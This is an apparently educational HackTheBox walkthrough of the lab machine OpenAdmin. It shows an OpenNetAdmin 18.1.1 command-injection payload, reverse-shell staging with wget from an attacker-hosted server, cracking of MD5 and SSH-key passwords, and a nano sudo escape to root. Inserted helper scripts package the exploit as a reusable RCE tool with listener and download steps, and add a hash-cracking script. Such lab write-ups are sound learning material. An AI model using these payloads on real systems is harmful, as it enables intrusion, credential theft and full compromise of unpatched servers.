OpenAdmin Walkthrough HackTheBox
OpenAdmin is a machine on the HackTheBox platform with the IP address 10.10.10.171. The machine retires today, so it is time to release a walkthrough on it. It is rated as an easy box and is therefore good for beginner penetration testers to practise their hacking skills. The box is pretty straightforward with few rabbit holes; if you do your enumeration correctly it becomes really easy to get root. It starts by finding a web directory that hosts the web application OpenNetAdmin, and that specific version (18.1.1) has a remote code execution (RCE) vulnerability. We leverage that to get a shell on the box. Then we find password reuse going on and use that to escalate our privileges to a user account. For root we find that a particular user can run nano as root without knowing the root password, and we find a way to open a shell from nano as root. Without much more to say, let's jump right in.
We'll start off with an Nmap scan to find the ports that are open on the box.
There are only two ports open on the machine (SSH and the web server on port 80), which makes our job easier when it comes to enumerating the box. Let's enumerate the web server on port 80, because that is the likely exploitation path. Opening the website:
We get the default Apache2 web page, with nothing much of interest to look at. I looked for common website files like robots.txt but found nothing interesting. So I did directory brute-forcing with gobuster, a tool that came preinstalled on my operating system, Parrot Sec OS.
We get three directories on the web server; I started by enumerating the sierra directory.
I first opened /sierra
and found nothing that I could exploit.
Second, I looked at /artwork
and still didn't find any low-hanging fruit that I could exploit.
Lastly I looked at /music
Nothing seemed interesting until I clicked the login link, which took me to a whole different page.
Looking at the browser tab, it exposes the name of the web application, OpenNetAdmin, and also the version of the software, v18.1.1. So I ran searchsploit on it.
searchsploit returns two exploits matching our exact version of the web application, which indicates that it is vulnerable to remote code execution (RCE). One of them is a Metasploit module, but for the purpose of demonstration I will be using the bash script.
I chose the bash script because Metasploit automates everything. I copied it to my working directory and took a look at it.
I used the curl command alone, without the additional arguments the bash script wraps around it. The command is injected into the ip argument of the ping tooltip; the BEGIN and END markers let sed cut the command output out of the HTML response. The payload is as written below:
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";ls -la;echo \"END\"&xajaxargs[]=ping" "http://10.10.10.171/ona/" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
And we have code execution. The next step is obviously getting a shell on the box. I tried the reverse shells from the Pentest Monkey reverse shell cheat sheet.
I tried several of them but none worked. We already had command execution, though, and the box has wget installed, so I decided to download a PHP reverse shell onto the box and execute it from there, since that gives a much more stable shell. [Ensure the IP address and the port of your listener are correctly configured in the shell.]
I hosted a simple web server using Python's SimpleHTTPServer module and downloaded the reverse shell to the box.
And when we do the directory listing again:
Now we can execute it and get a stable shell on the box.
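The curl one-liner above and the wget staging of the reverse shell, wrapped into a small helper. This is an added example, not code from the original write-up or from the searchsploit script: it assumes the same target URL and POST parameters as the one-liner, and the attacker IP, listener port and the /opt/ona/www download path in the usage comments are placeholders you substitute for your own setup.

```shell
#!/bin/sh
# Added example (not from the write-up): reusable wrapper for the
# OpenNetAdmin 18.1.1 xajax command injection shown in the curl one-liner.
# Assumes the target URL below; ATTACKER_IP/PORT in the comments are placeholders.

ONA_URL="${ONA_URL:-http://10.10.10.171/ona/}"

# form_encode STRING: percent-encode the characters that would otherwise be
# misread in an application/x-www-form-urlencoded body (% must go first).
form_encode() {
  printf '%s' "$1" | sed -e 's/%/%25/g' -e 's/ /%20/g' -e 's/"/%22/g' \
    -e 's/#/%23/g' -e 's/&/%26/g' -e 's/+/%2B/g' -e 's/;/%3B/g' \
    -e 's/=/%3D/g' -e 's/>/%3E/g'
}

# build_payload CMD: the POST body. CMD rides in the "ip" argument of the
# "ping" tooltip; "ip=>;" terminates the value the application expects, so
# the rest of the string is run by the shell. BEGIN/END are markers that let
# us cut the command output out of the HTML/XML response.
build_payload() {
  printf 'xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=%s&xajaxargs[]=ping' \
    "$(form_encode "ip=>;echo \"BEGIN\";$1;echo \"END\"")"
}

# extract_output: keep only the lines strictly between the BEGIN and END markers.
extract_output() {
  sed -n '/BEGIN/,/END/p' | sed '1d;$d'
}

# run_cmd CMD: execute CMD on the target and print its output (needs network).
run_cmd() {
  curl --silent -d "$(build_payload "$1")" "$ONA_URL" | extract_output
}

# Staging the reverse shell as described above (placeholders, adjust to taste):
#   python -m SimpleHTTPServer 80       # on the attacker box, serving shell.php
#   nc -lvnp 4444                       # listener matching the port set in shell.php
#   run_cmd 'wget http://ATTACKER_IP/shell.php -O /opt/ona/www/shell.php'
#   curl --silent "${ONA_URL}shell.php" # triggers the connect-back
if [ -n "${1:-}" ]; then
  run_cmd "$*"
fi
```

Run it as `sh ona_rce.sh id` to execute a single command, or source it and call run_cmd from an interactive shell. Encoding the whole injected string (rather than only = and > as in the one-liner) means commands containing +, & or # survive the trip through the form body intact.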
And we get a shell that doesn't die. Looking at /var/www there is a directory called internal; when I tried to access it I got permission denied, since it belongs to jimmy and the internal group.
The user www-data does not have access to that directory. We may come back to take a look at it once we have escalated our privileges.
Now I started doing manual enumeration of the web app's config files; sometimes you get lucky and find credentials there. In /opt/ona/www/local/config we get a MySQL database config file.
I logged into MySQL with those credentials, since we might find more credentials in the database.
I listed the tables in that database.
The only table that seemed interesting was users.
And we get more credentials from the MySQL database.
We get two MD5 hashes; cracking them with hashcat gives:
guest:098f6bcd4621d373cade4e832627b4f6 (cracked: test)
admin:21232f297a57a5a743894a0e4a801fc3 (cracked: admin)
Nothing else seemed interesting in the database.
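Why those two hashes fall so quickly: the users table stores plain, unsalted MD5, so every candidate password hashes to one fixed value that can be compared directly. The following added example (not part of the write-up, and not a replacement for hashcat) does exactly that check against a constructed five-word list; the two user:hash rows are the ones shown above.

```shell
#!/bin/sh
# Added example (not from the write-up): dictionary check of unsalted MD5
# hashes, the same thing hashcat mode 0 does at scale.

# Constructed input: the two rows pulled from the OpenNetAdmin "users" table.
ONA_USERS='guest:098f6bcd4621d373cade4e832627b4f6
admin:21232f297a57a5a743894a0e4a801fc3'

# Constructed mini-wordlist; a real run would use rockyou.txt or similar.
WORDLIST='password
123456
admin
letmein
test'

# md5_hex STRING: hex MD5 of STRING (no trailing newline fed to the hash).
md5_hex() {
  if command -v md5sum >/dev/null 2>&1; then
    printf '%s' "$1" | md5sum | cut -d' ' -f1
  else
    printf '%s' "$1" | md5 -q   # macOS/BSD fallback
  fi
}

# crack_md5 USER:HASH: print the first wordlist entry whose MD5 equals HASH,
# or nothing if the wordlist has no match.
crack_md5() {
  target=${1#*:}
  printf '%s\n' "$WORDLIST" | while IFS= read -r word; do
    if [ "$(md5_hex "$word")" = "$target" ]; then
      printf '%s\n' "$word"
      break
    fi
  done
}

# crack_all: one "user:hash:plaintext" line per row (plaintext empty if not found).
crack_all() {
  printf '%s\n' "$ONA_USERS" | while IFS= read -r row; do
    printf '%s:%s\n' "$row" "$(crack_md5 "$row")"
  done
}

crack_all
```

For anything beyond a toy list use hashcat (`hashcat -m 0 hashes.txt wordlist.txt`); the point of the script is that no secret is needed to test a guess, which is why the same logic works with billions of candidates per second on a GPU.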
I tried those credentials to see if I could escalate my privileges to root, since admin and root are basically the same thing.
It didn't work, so I looked at /etc/passwd for users that have a shell on the box and got two more users: jimmy and joanna.
I tried the credentials I had already found against those accounts and got a valid login for jimmy:
jimmy:n1nj4W4rri0R!
So there was password reuse going on: the database password from the config file also works for jimmy's account.
Now I tried to access the internal folder again and did not get permission denied.
There are three files in that folder; main.php seems the most interesting.
The PHP must be served by a web server on a particular port. I looked at the ports listening on localhost to see if there was one that might be interesting.
And we find port 52846, bound only to localhost, which is why we didn't see it in the nmap scan. It is the only port that looked odd, since all the other ports belong to standard services.
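The "which port looks odd" judgement above can be made systematically: list the LISTEN sockets, pick out the ones bound to loopback (the ones an external nmap scan can never see), and flag any port not in the list of services you already know about. The following is an added example, not from the write-up; the ss-style sample output is constructed to mirror what the box exposes, and the expected-port list is an assumption for this host.

```shell
#!/bin/sh
# Added example (not from the write-up): find listening ports an external scan
# misses and flag the ones that are not a known service. Works on `ss -tln`
# and `netstat -tln` output, both of which put the local address in column 4.

# Constructed sample modelled on the box: SSH and HTTP reachable from outside,
# MySQL and one odd service (52846) bound only to localhost.
SAMPLE_SS='State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*
LISTEN  0       80      127.0.0.1:3306       0.0.0.0:*
LISTEN  0       128     127.0.0.1:52846      0.0.0.0:*
LISTEN  0       128     *:80                 *:*'

# Assumed for this host: the services we already know about (SSH, Apache, MySQL).
EXPECTED_PORTS='22 80 3306'

# loopback_listeners: addr:port of every LISTEN socket bound to 127.0.0.1 or
# ::1; these are exactly the services nmap from outside cannot see.
loopback_listeners() {
  awk '($1 == "LISTEN" || $NF == "LISTEN") &&
       ($4 ~ /^127\.0\.0\.1:/ || $4 ~ /^\[::1\]:/) { print $4 }'
}

# odd_listeners: addr:port of every LISTEN socket whose port is not in
# EXPECTED_PORTS, whatever address it is bound to.
odd_listeners() {
  awk -v expected="$EXPECTED_PORTS" '
    BEGIN { n = split(expected, e, " "); for (i = 1; i <= n; i++) ok[e[i]] = 1 }
    ($1 == "LISTEN" || $NF == "LISTEN") {
      port = $4; sub(/.*:/, "", port)
      if (!(port in ok)) print $4
    }'
}

# On the box:   ss -tln | odd_listeners      (or: netstat -tln | odd_listeners)
# then look at what lives there, e.g. curl --silent http://127.0.0.1:52846/main.php
printf '%s\n' "$SAMPLE_SS" | odd_listeners
```

On the sample this prints only 127.0.0.1:52846. Keeping the known-port list short and explicit is deliberate: a new entry in the output is something you have not accounted for, which is the question you actually want answered during enumeration.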
I fetched that page with curl (the command-line tool for transferring data with URL syntax) to see if I could access it from the box.
And we get joanna's SSH private key, which is encrypted with a passphrase.
That is one way to discover that the specific port was open. When I initially did the box I used wfuzz and fuzzed all 65535 ports to find which ones were open (I know it was dumb).
Anyway, we have an encrypted private key, so let's crack the passphrase using John the Ripper.
I copied the private key back to my box.
I used ssh2john, a Python script that converts the key into a format John the Ripper understands, and then ran john to crack the passphrase.
And finally we get the passphrase: bloodninjas. Now we can log into the box via SSH using the private key, after giving it the appropriate permissions (chmod 600 private_key).
Now we are on the box as joanna.
We can now submit the user flag and get the points
Now we have to escalate our privileges to root. Running sudo -l shows that joanna can run nano as root without a password.
Now we have to find a way to either execute commands from inside nano or read and write files as root.
Looking at GTFOBins, there is a way to execute commands from inside the nano text editor.
Inside nano, press Ctrl+R followed by Ctrl+X.
Nano then prompts for the command to execute. The one GTFOBins lists, reset; sh 1>&0 2>&0, essentially opens a shell on the box as root.
And we get a root shell after the command is executed.
After clearing the screen we have a shell as root on openadmin. Now we can submit the final flag and get the points.
And that's how I did OpenAdmin. I know you can also SSH-tunnel the local port running the web page and access it from your own box, but that would have been a valid technique only if there had been no other way to reach the page. I have a walkthrough of another HackTheBox machine, Servmon, coming up once it retires, in which I will show that technique. That's it for now guys, take care and have a nice time, stay SAFE as we fight COVID-19 and practise safe hacking. Till next time, it's me Ian Musyoka signing off.
If you liked the walkthrough you can clap for me down below